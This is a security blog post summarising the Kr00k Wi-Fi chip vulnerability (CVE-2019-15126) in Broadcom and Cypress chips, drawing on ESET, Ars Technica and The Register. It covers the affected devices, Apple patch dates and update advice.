A vulnerability in WiFi chips made by Cypress Semiconductor and Broadcom left billions of devices susceptible to an attack that allowed nearby attackers to decrypt sensitive data sent over the air.The security flaw was detailed at the RSA security conference yesterday (via Ars Technica), and for Apple users, the issue was addressed in the iOS 13.2 and macOS 10.15.1 updates that were released back in late October.
Dubbed Kr00k, the WiFi chip flaw caused vulnerable devices to use an all-zero encryption key to encrypt part of a user's communications. When applied successfully, the attack let hackers decrypt some wireless network packets sent by a vulnerable device. As described by Ars Technica:
Kr00k – formally known as CVE-2019-15126 – is a vulnerability in Broadcom and Cypress Wi-Fi chips that allows unauthorized decryption of some WPA2-encrypted traffic.
Kr00k exploits a weakness that occurs when wireless devices disassociate from a wireless access point. If either the end-user device or the access point is vulnerable, it will put any unsent data frames into a transmit buffer and then send them over the air. Rather than encrypt this data with the session key negotiated earlier and used during the normal connection, vulnerable devices use a key consisting of all zeros, a move that makes decryption trivial.
Which Wi-Fi chips exactly were vulnerable?
According to ESET Research, this vulnerability affects Wi-Fi chips used in devices manufactured by various vendors, the patching process involves both the chip manufacturers (Broadcom and Cypress), as well as the device manufacturers. ESET responsibly disclosed the identified vulnerability to Broadcom and Cypress, who subsequently released patches to the individual device manufacturers.
Furthermore, to expand the scope of our responsible disclosure, ESET has worked with ICASI to ensure that all possibly affected device manufacturers are aware of Kr00k.
Who is affected?
The vulnerability affects all unpatched devices with Broadcom and Cypress FullMac Wi-Fi chips. These are the most common Wi-Fi chips used in today's client devices, made by well-known manufacturers including Amazon (Echo, Kindle), Apple (iPhone, iPad, MacBook), Google (Nexus), Samsung (Galaxy) as well as devices under many other brands.
Wi-Fi Access points and routers are also affected by Kr00k, making even environments with patched client devices vulnerable. All-in-all, before patching there were more than a billion affected devices.
Who Isn't Affected?
"We have also tested some devices with Wi-Fi chips from other manufacturers, including Qualcomm, Realtek, Ralink, Mediatek and did not see the vulnerability manifest itself," said ESET.
Even though the security blunder lies within the Wi-Fi chips themselves, the researchers say it can be fixed at the software level. We can imagine such fixes ensure the transmit buffer is not emptied after a disassociation or a key change, and instead dumped. These controllers feature embedded CPU cores directing their operation, and presumably these can be reprogrammed to not flush transmission queues over the air with zeroed encryption keys.
How do I know if I’m still vulnerable to Kr00k?
Make sure you have updated all your Wi-Fi capable devices, including phones,
tablets, laptops, and Wi-Fi access points and routers to the latest operating system, software and/or firmware versions. According to our information, patches for devices by major manufacturers have been released by now.
To address KrØØk, therefore, users and admins should, says ESET, look out for driver or firmware updates for affected devices. ESET seems confident fixes are available, though your mileage may vary. The supply chain from the likes of Broadcom and Cypress to manufacturers of Internet-of-Things devices and other wireless-enabled equipment through to end users can be rather long and winding, and there are plenty of places for code updates to snag and never see the light of day.
In the meantime, encrypt as much network traffic as possible, especially over Wi-Fi, using HTTPS, SSH, VPNs, and so on, so that if your network-level encryption is smashed, you're still protected from snoopers at the application layer or thereabouts.
Released patches:
While we don’t have a comprehensive overview of when all these vendors have subsequently released software updates (due to the large number), we are aware of the following:
iOS 13.2 and iPadOS 13.2 - October 28, 2019
macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006 - October 29, 2019
macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006 - October 29, 2019
Inquiries whether your devices with affected chips have been patched - or if your device uses the affected chips in the first place - need to be directed at your device manufacturer.
___________________________________________
- theregister.co.uk/2020/02/27/wifi_chip_bug_eset/
- https://www.eset.com/int/kr00k/
So “Once more unto the breach, dear friends, once more;”
____________________________________________________________
About Rick Ricker
An IT professional with over 23 years' experience in Information Security, wireless broadband, network and Infrastructure design, development, and support.
For more information, contact Rick at rwricker@gmail.com
No comments:
Post a Comment
Thanks for your input, your ideas, critiques, suggestions are always welcome...
- Wasabi Roll Staff